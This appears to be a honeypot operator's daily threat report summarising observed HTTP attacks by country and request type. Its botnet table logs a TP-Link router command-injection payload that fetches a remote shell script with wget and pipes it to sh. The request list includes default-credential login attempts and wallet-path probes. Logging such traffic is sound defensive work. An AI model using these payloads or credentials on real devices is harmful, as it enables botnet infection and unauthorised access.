Daily Report: 2025-08-29#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 13 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 37 new requests that have never been observed before (these were added to the monitored request database.).
A total of 577 requests were recorded during the day, originating from 13 different countries, with a peak of 229 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| FR | Germany |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 121.155.192.188 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 177.69.131.214 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 99.232.224.106 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 79.87.146.24 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 176.206.226.104 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 221.159.119.6 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 220.87.141.80 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 157.107.226.41 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 121.167.125.180 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 98.151.209.12 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 222.112.119.3 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 58.40.8.206 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
| 220.81.150.55 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 5 | 11 | CONNECT 196.251.67.42:80 HTTP/1.0 |
| 8 | 6 | CONNECT 45.221.64.243:80 HTTP/1.0 |
| 10 | 5 | CONNECT 196.251.86.195:80 HTTP/1.0 |
| 94 | 1 | \x04\x01\x00P\xC4\xFBC*root:root123\x00 |
| 95 | 1 | \x04\x01\x00P\xC4\xFBC*ftpuser:ftpuser\x00 |
| 96 | 1 | \x04\x01\x00P\xC4\xFBC*leo:DVdmEU8usfIYEiYD9txyX\x00 |
| 97 | 1 | \x04\x01\x00P\xC4\xFBC*\x00 |
| 98 | 1 | \x04\x01\x00P\xC4\xFBV\xC3fwupgrade:DVdmEU8usfIYEiYD9txyX\x00 |
| 99 | 1 | \x04\x01\x00P\xC4\xFBV\xC3test:test\x00 |
| 118 | 1 | GET /logged.jsp HTTP/1.1 |
| 119 | 1 | \x04\x01\x00P\xC4\xFBC*admin:admin\x00 |
| 121 | 1 | \x04\x01\x00P\xC4\xFBV\xC3root:toor\x00 |
| 122 | 1 | \x04\x01\x00P\xC4\xFBC*root:P@ssw0rd\x00 |
| 123 | 1 | \x04\x01\x00P\xC4\xFBC*root:P4ssw0rd\x00 |
| 124 | 1 | \x04\x01\x00P\xC4\xFBC*user1:user1\x00 |
| 125 | 1 | \x04\x01\x00P\xC4\xFBC*logout:logout\x00 |
| 126 | 1 | \x04\x01\x00P\xC4\xFBC*support:support\x00 |
| 127 | 1 | \x04\x01\x00P\xC4\xFBC*pi:raspberry\x00 |
| 128 | 1 | \x04\x01\x00P-\xDD@\xF3ubnt:ubnt\x00 |
| 186 | 1 | GET /wallets/ HTTP/1.1 |
| 187 | 1 | GET /bkp/ HTTP/1.1 |
| 188 | 1 | GET /sql/ HTTP/1.1 |
| 189 | 1 | GET /pay/ HTTP/1.1 |
| 190 | 1 | GET /9547616831 HTTP/1.1 |
| 191 | 1 | GET /3/ HTTP/1.1 |
| 192 | 1 | GET /2/ HTTP/1.1 |
| 193 | 1 | GET /1/ HTTP/1.1 |
| 200 | 1 | GET /send/ HTTP/1.1 |
| 201 | 1 | \x04\x01\x00P\xC4\xFBV\xC3\x00 |
| 214 | 1 | \x04\x01\x00P\xC4\xFBV\xC3service:service\x00 |
| 215 | 1 | \x04\x01\x00P-\xDD@\xF3\x00 |
| 263 | 1 | \x04\x01\x00P-\xDD@\xF3user1:user1\x00 |
| 284 | 1 | GET /solana/ HTTP/1.1 |
| 285 | 1 | GET /dumps/ HTTP/1.1 |
| 286 | 1 | GET /log/ HTTP/1.1 |
| 287 | 1 | GET /coin/ HTTP/1.1 |
| 289 | 1 | GET /tron/ HTTP/1.1 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 229 | GB |
| 1 | 82 | US |
| 2 | 43 | DE |
| 3 | 38 | GH |
| 4 | 34 | SC |
| 5 | 34 | HK |
| 6 | 19 | ZA |
| 7 | 17 | FR |
| 8 | 15 | NL |
| 9 | 12 | KR |
| 10 | 10 | CA |
| 11 | 6 | TR |
| 12 | 5 | BG |
| 13 | 4 | AE |
| 14 | 4 | NO |
| 15 | 3 | CN |
| 16 | 3 | JP |
| 17 | 3 | BR |
| 18 | 3 | RO |
| 19 | 2 | MC |
| 20 | 2 | PL |
| 21 | 2 | IR |
| 22 | 1 | ES |
| 23 | 1 | SG |
| 24 | 1 | IN |
| 25 | 1 | IT |
| 26 | 1 | AZ |
| 27 | 1 | BE |
| 28 | 1 | SE |